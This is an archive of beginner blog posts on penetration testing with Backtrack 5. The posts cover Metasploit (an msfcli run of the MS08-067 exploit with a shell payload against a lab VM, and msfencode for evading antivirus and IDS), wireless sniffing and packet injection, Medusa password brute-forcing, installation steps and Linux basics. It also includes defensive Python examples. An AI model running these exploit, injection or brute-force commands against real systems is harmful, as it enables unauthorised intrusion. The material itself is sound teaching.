Showing posts with label backtrack.

Wednesday, February 25, 2015

Metasploit Tutorial: Introduction



  1. Metasploit Terms
  2. MSFconsole
  3. MSFcli
  4. Armitage
  5. MSFpayload
  6. MSFencode
Metasploit is a valuable tool in pen testing a network. However, it can be very confusing for a beginner. These Metasploit tutorials will help you get up and running with Metasploit. Most of our hacking will be targeted at Windows machines. As a reminder and site disclaimer: I am not responsible for your actions! This is for education only!
Recommended Reading: Metasploit: The Penetration Tester's Guide
A book that will show you most of the Metasploit framework. However, it leaves you to discover the true power of Metasploit for yourself. Overall, highly recommended.

Metasploit Terms

Exploit – to take advantage of a security flaw within a system, network, or application.
Payload – code that the Metasploit framework has the victim computer execute.
Module – a small piece of code that can be added to the metasploit framework to execute an attack.
Shellcode – a small piece of code used as a payload.

MSFconsole

Msfconsole is an all-in-one interface to most of the features in Metasploit. Msfconsole can be used to launch attacks, create listeners, and much, much more. We will be using msfconsole throughout these tutorials; mastering it will allow you to keep up with Metasploit's rapidly changing framework. Metasploit comes installed by default on Backtrack 5. To access msfconsole, open your console and type:
root@bt:~# cd /opt/framework3/msf3/
root@bt:/opt/framework3/msf3# msfconsole
After some time, the msfconsole will boot.
To view the help files, simply type help followed by the command you want to know more about. In our case, we want to learn about the connect command, which allows us to communicate with a host.
msf > help connect

MSFcli

Msfcli is another way to access the Metasploit framework, but it focuses more on scripting and interoperability with other console-based tools. To view the msfcli help, type:
root@bt:~# cd /opt/framework3/msf3
root@bt:~# msfcli -h
Now we are going to do a little test run of msfcli. It's important to note that whenever you're learning Metasploit and you get stuck, you can see the options of a module by adding the letter O to the end of the line. For example:
root@bt:~# msfcli windows/smb/ms08_067_netapi O
This module requires three options: RHOST, RPORT, and SMBPIPE. Adding P to the end allows us to see what payloads we can use.
root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 P
We can run our exploit by selecting a payload, filling out the options, and passing the letter E at the end of the msfcli argument string.
root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 PAYLOAD=windows/shell/bind_tcp E
Note: the IP address assigned to RHOST is a Windows XP machine that I have in a virtual machine. It will act as our victim machine for testing. You will have to do the same with another computer or a virtual machine. For practice, do not update your victim machine or install anti-virus. We want to be able to use our exploits without them being patched over by Windows updates. We will go over this more in-depth later on.


Armitage

The Armitage component of Metasploit is a fully interactive graphical user interface.

Running Armitage

  1. Run the command armitage.
  2. Select Start MSF.

MSFpayload

The msfpayload component of Metasploit generates shellcode and executables. Shellcode can be generated in many formats, including C, Ruby, JavaScript and even Visual Basic. Each output will be useful in various situations.
For msfpayload help, type:
root@bt:~# msfpayload -h
Just like msfcli, if you need to find out the required options, append the letter O on the command line.
root@bt:~# msfpayload windows/shell_reverse_tcp O

MSFencode

The shellcode generated by msfpayload is functional, but it contains several null characters that, when interpreted by many programs, signify the end of a string, and this will cause the code to terminate before completion.
In addition, shellcode traversing a network in cleartext is likely to be picked up by intrusion detection systems (IDSs) and antivirus software. To address this problem, Metasploit’s developers offer msfencode, which helps you to avoid bad characters and evade antivirus and IDSs by encoding the original payload in a way that does not include “bad” characters.
Enter msfencode -h to see a list of msfencode options.
Metasploit contains a number of different encoders for different situations. Some will be useful when you can use only alphanumeric characters as part of a payload, as is the case with many file format exploits or other applications that accept only printable characters as input, while others are great general-purpose encoders that do well in every situation. A very popular and well-known encoder is x86/shikata_ga_nai.
To see the list of encoders available, append -l to msfencode as shown next. The encoders are ranked in order of reliability.
root@bt:~# msfencode -l

Tuesday, February 24, 2015

Packet Sniffing and Injecting in Backtrack

Introduction:
This is a multi-part tutorial that will show you the tools of wireless attacks and penetration testing.
Required Hardware:
Most of this isn’t really required, but will be helpful on your hacking adventures.
  • And finally, a connection to the internet.
Recommended Reading: BackTrack 5 Wireless Penetration Testing Beginner’s Guide
This book covers a lot of the topics you'll find on this site. However, it goes into much more depth, in easy-to-follow, simple, step-by-step lessons. Highly recommended for anyone starting out in wireless security/hacking.

Tutorial 1: Setting up your wireless card
Plug in the wireless adapter into your laptop’s USB port.
Log in, open up the console and type: iwconfig. The iwconfig command lists all wireless interfaces on your machine. In my case, I have my Alfa One adapter connected as wlan0. Typing iwconfig wlan0 will display more information about your wlan0 interface. The MAC address that is displayed should match the MAC address written on the back of your wireless adapter.
Now put your wireless adapter into monitor mode. To do this, simply type: airmon-ng start wlan0. The monitor interface will be named mon0.
Tutorial 2: Getting networking on BackTrack
By default, Backtrack does not boot with working networking; this is to increase its stealth when penetration testing. The easiest way to get networking is to use the WICD Network Manager. Click Applications -> Internet -> WICD Network Manager. Then select your wireless access point and connect.
If you receive an error message that says "Could not connect to wicd's D-Bus interface. Check the wicd log for error message." then simply enter the following commands into your terminal:
root@bt:~# dpkg-reconfigure wicd
root@bt:~# update-rc.d wicd defaults

Then restart your machine and the error should not occur anymore.

Packet Sniffing and Packet Injecting

WLAN Frames:
  1. Management frames: Management frames are responsible for maintaining communication between the access points and wireless clients.
  2. Control frames: Control frames are responsible for ensuring a proper exchange of data between the access point and wireless clients.
  3. Data frames: Data frames carry the actual data sent on the wireless network. There are no sub-types for data frames.
Packet Sniffing with Wireshark
Open Wireshark by navigating the application menu or by typing "wireshark" in the console.
Once Wireshark is open, click Interface List (1). A second window will open with a list of interfaces that can capture packets. Notice our monitor device mon0 is there from when we set it up earlier. Click Start (2) and Wireshark will begin to capture packets and display them in the window. These are wireless packets which your wireless card (in my case the Alfa One adapter) is sniffing out of the air.
Now let's sniff packets from our own access point. To do this, we are going to use airodump-ng. Airodump-ng is used to capture wireless packets, typically from WEP-encrypted networks, with the idea that you will then use aircrack-ng on the capture (don't worry, we'll get to that soon). But for this time around, let's turn off the encryption on our wireless access point.
Now open up the terminal and type:
airodump-ng --bssid 5C:D9:98:6A:64:8A mon0
Note: 5C:D9:98:6A:64:8A is the MAC address of my wireless access point. To find yours, go to your wireless router's web interface and look for status. There you should find the wireless MAC address of your router.
After airodump-ng finishes, you will see your access point with the channel it is running on.
Now we have to lock on to our access point by setting our wireless card to the channel of our access point. To do this, type:
iwconfig mon0 channel 6
(Where “6” is the channel of your access point.)
Now fire up Wireshark and sniff packets on your mon0 interface. Then type in the filter box:
(wlan.bssid == MAC ADDRESS HERE) && (wlan.fc.type_subtype == 0x20)
Now we will be sniffing only data packets from our access point.
Packet Injecting
First we want to see only non-beacon packets in Wireshark. So open Wireshark and type in your filter box:
(wlan.bssid == 5C:D9:98:6A:64:8A) && !(wlan.fc.type_subtype == 0x08)
Note: Replace 5C:D9:98:6A:64:8A with your own access point's MAC address.
Then open the terminal and type:
aireplay-ng -9 -e "Hack Lab" -a 5C:D9:98:6A:64:8A mon0
Note: Replace Hack Lab with your own SSID and 5C:D9:98:6A:64:8A with your own access point's MAC address.
If you go back to Wireshark, you should see some packets that were injected. These are just random packets that do not have any real effect.
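The two display filters used in this tutorial (0x20 for data frames, 0x08 for beacons) are values of Wireshark's wlan.fc.type_subtype field, which is built from the first byte of the 802.11 Frame Control field. As an added example that is not part of the original post, the Python below decodes that byte the same way, classifies frames into the management/control/data types listed above, and applies both filters to a constructed capture. The sample frames and the second BSSID (00:11:22:33:44:55) are constructed; the access point address is the one used on this page.

```python
"""Decode the 802.11 Frame Control byte the way Wireshark's
wlan.fc.type_subtype field does, and apply this page's two filters."""

# Frame type codes carried in the Frame Control field (IEEE 802.11).
FRAME_TYPES = {0: "management", 1: "control", 2: "data"}

# A few (type, subtype) names relevant to this page; not an exhaustive table.
SUBTYPE_NAMES = {
    (0, 4): "probe request",
    (0, 8): "beacon",
    (0, 12): "deauthentication",
    (1, 13): "ack",
    (2, 0): "data",
    (2, 8): "qos data",
}

def decode_frame_control(fc_byte: int) -> dict:
    """Split the first Frame Control byte into version, type and subtype.
    Bit layout, least significant bits first: version(2) type(2) subtype(4)."""
    version = fc_byte & 0x03
    ftype = (fc_byte >> 2) & 0x03
    subtype = (fc_byte >> 4) & 0x0F
    # Wireshark's wlan.fc.type_subtype packs these as (type << 4) | subtype,
    # which is why a beacon shows as 0x08 and a plain data frame as 0x20.
    return {
        "version": version,
        "type": FRAME_TYPES.get(ftype, "reserved"),
        "subtype": SUBTYPE_NAMES.get((ftype, subtype), f"subtype {subtype}"),
        "type_subtype": (ftype << 4) | subtype,
    }

def matches_filter(frame: dict, bssid: str, only_data: bool) -> bool:
    """only_data=True  mirrors (wlan.bssid == X) && (wlan.fc.type_subtype == 0x20)
    only_data=False mirrors (wlan.bssid == X) && !(wlan.fc.type_subtype == 0x08)"""
    if frame["bssid"].lower() != bssid.lower():
        return False
    ts = decode_frame_control(frame["fc"])["type_subtype"]
    return ts == 0x20 if only_data else ts != 0x08

def filter_capture(frames, bssid, only_data):
    """Return the type_subtype values of the frames the filter keeps."""
    return [decode_frame_control(f["fc"])["type_subtype"]
            for f in frames if matches_filter(f, bssid, only_data)]

# Constructed sample capture: the tutorial's AP plus a made-up neighbour.
AP = "5C:D9:98:6A:64:8A"
SAMPLE_FRAMES = [
    {"bssid": AP, "fc": 0x80},                   # beacon    -> 0x08
    {"bssid": AP, "fc": 0x08},                   # data      -> 0x20
    {"bssid": AP, "fc": 0x88},                   # QoS data  -> 0x28
    {"bssid": AP, "fc": 0xC0},                   # deauth    -> 0x0C
    {"bssid": "00:11:22:33:44:55", "fc": 0x08},  # data from another AP
]

if __name__ == "__main__":
    for f in SAMPLE_FRAMES:
        print(f["bssid"], decode_frame_control(f["fc"]))
    print("data only :", [hex(t) for t in filter_capture(SAMPLE_FRAMES, AP, True)])
    print("non-beacon:", [hex(t) for t in filter_capture(SAMPLE_FRAMES, AP, False)])
```

Note that the "non-beacon" filter still passes QoS data (0x28) and deauthentication (0x0C) frames, so a capture filtered that way is where a sudden burst of deauthentication frames against your own access point would show up.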

Sunday, February 22, 2015

Medusa and commands in Backtrack

Medusa

Medusa is a log-in brute forcer that attempts to gain access to remote services by guessing at the user password. Medusa is capable of attacking a large number of remote services including FTP, HTTP, MySQL, Telnet, VNC, Web Form, and more. In order to use Medusa, you need several pieces of information including the target IP address, a username or username list that you are attempting to log in as, a password or dictionary file containing multiple passwords to use when logging in, and the name of the service you are attempting to authenticate with.
Medusa comes installed on Backtrack 5. However, if you are using a different version of Backtrack without Medusa, type:
apt-get update
apt-get install medusa

When using online password crackers, the potential for success can be greatly increased if you combine this attack with information gathered from reconnaissance and scanning. An example of this is when you find usernames, passwords, and email addresses. Programs like Medusa will take a username and password list and keep guessing until it uses all the passwords. Be aware that some remote access systems employ a password throttling technique that can limit the number of unsuccessful log-ins you are allowed. Your IP address can be blocked or the username can be locked out if you enter too many incorrect guesses.
Backtrack includes a few word lists that you can use for your brute forcing adventures. You can find one list at:
/pentest/passwords/wordlists/
In order to execute the brute-force attack, open a terminal and type the following:
medusa -h target_ip -u username -P path_to_password_dictionary -M service_to_attack
"-h" is used to specify the IP address of the target host. "-u" is used for a single username that Medusa will use to attempt log-ins. "-P" is used to specify an entire list containing multiple passwords; it needs to be followed by the actual location or path to the dictionary file. The "-M" switch is used to specify which service we want to attack.
Here I launch an attack against my own ssh server.
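A defender's view of the run described above, as an added example that is not part of the original post: the Python script below parses sshd log lines, counts failed logins per source address inside a short window, and flags any source that would trip the kind of lockout threshold the text warns about, noting whether a success followed the burst. The log lines, the host name "lab", the port numbers and the threshold values are all constructed for the example; the 192.168.56.x addresses mirror the lab range used in these posts.

```python
"""Detection-side view of an online password-guessing run: parse sshd log
lines and flag any source that trips a lockout-style failure threshold."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches "Failed password for root from ...", "Failed password for invalid
# user admin from ..." and "Accepted password for ... from ...".
LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

def parse_line(line: str, year: int = 2015):
    """Return (timestamp, result, user, ip), or None for unrelated lines.
    syslog lines carry no year, so one is supplied (2015, the post's date)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=2)):
    """Flag each source IP with >= threshold failed logins inside `window`.
    Returns {ip: {"failures": n, "users": [...], "success_after": bool}};
    success_after means a login from that IP succeeded at/after the burst."""
    events = sorted(e for e in map(parse_line, lines) if e)
    by_ip = defaultdict(list)
    for ts, result, user, ip in events:
        by_ip[ip].append((ts, result, user))
    alerts = {}
    for ip, evs in by_ip.items():
        fails = [(ts, user) for ts, res, user in evs if res == "Failed"]
        for i in range(len(fails)):  # slide a time window over the failures
            j = i
            while j + 1 < len(fails) and fails[j + 1][0] - fails[i][0] <= window:
                j += 1
            if j - i + 1 >= threshold:
                last_fail = fails[j][0]
                alerts[ip] = {
                    "failures": j - i + 1,
                    "users": sorted({u for _, u in fails[i:j + 1]}),
                    "success_after": any(res == "Accepted" and ts >= last_fail
                                         for ts, res, _ in evs),
                }
                break
    return alerts

# Constructed sample log: a guessing burst from 192.168.56.1, one stray failure.
SAMPLE_LOG = """\
Feb 22 10:15:01 lab sshd[2201]: Failed password for root from 192.168.56.1 port 40211 ssh2
Feb 22 10:15:01 lab sshd[2203]: Failed password for root from 192.168.56.1 port 40212 ssh2
Feb 22 10:15:02 lab sshd[2205]: Failed password for root from 192.168.56.1 port 40213 ssh2
Feb 22 10:15:02 lab sshd[2207]: Failed password for root from 192.168.56.1 port 40214 ssh2
Feb 22 10:15:03 lab sshd[2209]: Failed password for root from 192.168.56.1 port 40215 ssh2
Feb 22 10:15:03 lab sshd[2211]: Accepted password for root from 192.168.56.1 port 40216 ssh2
Feb 22 10:20:00 lab sshd[2300]: Failed password for invalid user bob from 10.0.0.5 port 50000 ssh2
""".splitlines()

if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

A "success_after" alert is the one worth acting on first: it means the word list contained a valid password for that account.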
More to come!


Updating and Linux Commands


Before we can begin hacking away with Backtrack, we first must do a little updating. Backtrack contains a ton of programs and frameworks, such as Metasploit, which are constantly updated. You may have to update your tools two or three times a week. Also, if you are new to Linux operating systems, you will have to learn how to use the terminal and basic Linux commands. So let's get started.


Updating Backtrack 5

Since Backtrack is based on Ubuntu 10.04 (which is based on Debian), it has the apt-get command. Apt-get is a powerful command-line tool that is used for installing new software packages, updating, and even upgrading the operating system. We will use this command to get the latest version of Backtrack. After logging in to Backtrack, open a terminal (Applications > Accessories > Terminal):
Then issue the following command:
root@bt:~# apt-get update && apt-get upgrade && apt-get dist-upgrade
The command will then select all the new updates for Backtrack, and after a short time it will ask you to continue. Press 'y' for yes.
If you just installed Backtrack, this update will take about 15-20 minutes. Keep an eye on the console for when it asks "Do you want to continue?". Again, press 'y' for yes. You will want to run the command apt-get update && apt-get upgrade once a week to keep Backtrack up-to-date.


Linux Commands

There are many Linux commands, and they can be used in various combinations. I will list the basic ones which you should learn if you are new to Linux and Backtrack. Most commands can have parameters which give them added functionality. To see the parameters, or to learn what a command does, add -h or --help after them.
(Example: cat --help).
  • cat – This command is short for "concatenate" and prints a file's contents to standard output.
    Example: cat filename
  • cd – Change Directory. Switches the current directory you are in.
    Example: cd foldername
    Example: cd root/Desktop/
  • clear – clears the terminal screen.
  • ls – Lists the files and folders within the current directory. (Note that it is a lowercase 'L', not 'i'.)
  • mkdir – Make Directory. Create a new directory of the given name
    Example: mkdir myFolder
  • ping – Sends a packet to a host and waits for a response.
    Example: ping -c 4 google.com (The -c 4 parameter limits the ping to 4 counts).
  • rm – Remove. Removes a file or folder.
    Example: rm filename

Saturday, February 21, 2015

How to Install Backtrack 5

Download the Backtrack 5 ISO

Head over to: http://www.backtrack-linux.org/downloads/
Then click the download button.
After that, you will be able to pick the version of Backtrack that you want. I am going to recommend Backtrack 5 R3 since it is the most up-to-date. The window manager is up to you, but I am going to use GNOME. Since I will be using Backtrack in a virtual machine, the 32-bit version will be fine. We want the ISO because we can use it on a DVD, a USB flash drive, and to install on a virtual machine. Direct download or torrent download is up to you. The file is a little over 3 GB, so it may take some time depending on your internet speed.

Setting up a Virtual Machine

A virtual machine (VM) is the software implementation of a physical computer. In other words, it’s having another computer on your current computer. If you have never used a virtual machine it is a good time to start. VMs are excellent when it comes to practice labs which we will get to in another section.
To start, you’re going to need to get VM software. There are many out there, but I will list a few popular ones.
  1. VMware Workstation 9 (Windows/Linux) – $249.00 USD
  2. VMware Player (Windows/Linux)  – Free
  3. VirtualBox (Windows/Mac/Linux) – Free
Whichever VM software you go with, make sure it has a way to network with other VMs. If you don't want to spend the money, go with VirtualBox. If you plan to get serious with penetration testing, you might want to consider getting a VMware Workstation license. It is full of useful tools and goodies such as VM sharing and remote access, and it is easy to work with.
I will be using VMware Workstation, but these programs are very similar in function. You shouldn't have trouble following along if you are using something else.
After everything is installed and running, click “Create new virtual machine”.
Next you’re going to select “Installer disc image file” then browse for the backtrack 5 ISO.
Select the operating system as linux, and the version as Ubuntu.
Give the virtual machine a name such as “Backtrack 5 R3” and select a location for where you want to save the virtual machine files.
When asked how large you want the virtual disk to be, choose at least 25 GB. This will be the most demanding requirement of Backtrack 5. I went and used 40 GB for my virtual machine. Although the backtrack-linux wiki says you need at least 20 GB, I found you will run out of space by the time you install updates or any other software. Then, you will have the option of storing the virtual disk as a single file, or splitting it into multiple files. Creating a virtual disk as a single file will allocate all of the space right away. Splitting it into multiple files means the drive files will grow as you need them. So if your hard drive space is limited on your host system, go with multiple files. If you have a massive drive and are not worried about space, go with a single file.
And that's it! The virtual machine is ready to go. I left mine at 1 GB of RAM; if you are short on memory, you can change this in the virtual machine settings. The recommended minimum memory is 512 MB, however you can try lower if you need to.
Power on the virtual machine and you will be ready to install Backtrack.

Installing Backtrack 5

If you are installing on a hard drive, you will need to burn the Backtrack 5 ISO on to a DVD or a USB Drive. For directions on installing to a USB Drive, see here (link).
First turn on your machine, then insert your DVD or USB drive. Then press the key that allows you to select your boot drive. You may have to go into the BIOS to enable this. Most often, F12 will work. Select either your DVD drive or your USB drive to boot from it. You should see a screen like this:
After a few moments, you will see the Backtrack Live CD menu. Press Enter on "Backtrack Text – Default Boot Text Mode".
Wait about 10 seconds, and you will come to the Backtrack shell. Type the command "startx" to load the GUI.
After another few moments, you will come to the Backtrack desktop. Double-click "Install Backtrack" to begin the install process.
After you select your time zone and language, you then have to partition your drive. If you are using a virtual machine, go ahead and use the whole drive. If you are dual booting, you will have to specify the partitions for your two operating systems.
Continue through the installer, and then click Finish. Backtrack will then install on to your system. This process takes about 10-15 minutes.
After it is finished, restart your system.

Backtrack 5 Login

After restarting, you will come to a login screen like this:
The default username for Backtrack is "root" and the password is "toor". After typing in the root username and password, you will come back to the Backtrack shell. Type "startx" to enter the GUI desktop.

Creating a Bootable USB Drive

Required Items:
UNetbootin is a program that allows you to create bootable USB drives for linux distros and Windows. UNetbootin will download the distribution or use an ISO file you selected from your hard drive.
  1. Once UNetbootin is downloaded you can run it by double clicking (Windows)
  2. Plug in your USB Drive.
  3. Start UNetbootin and select the "diskimage" option, then select your Backtrack 5 ISO.
  4. Select your USB Drive, then click “OK”.
    WARNING: This will format your USB Drive and remove all previous data.
Now you should be able to boot off of your USB Drive with Backtrack 5.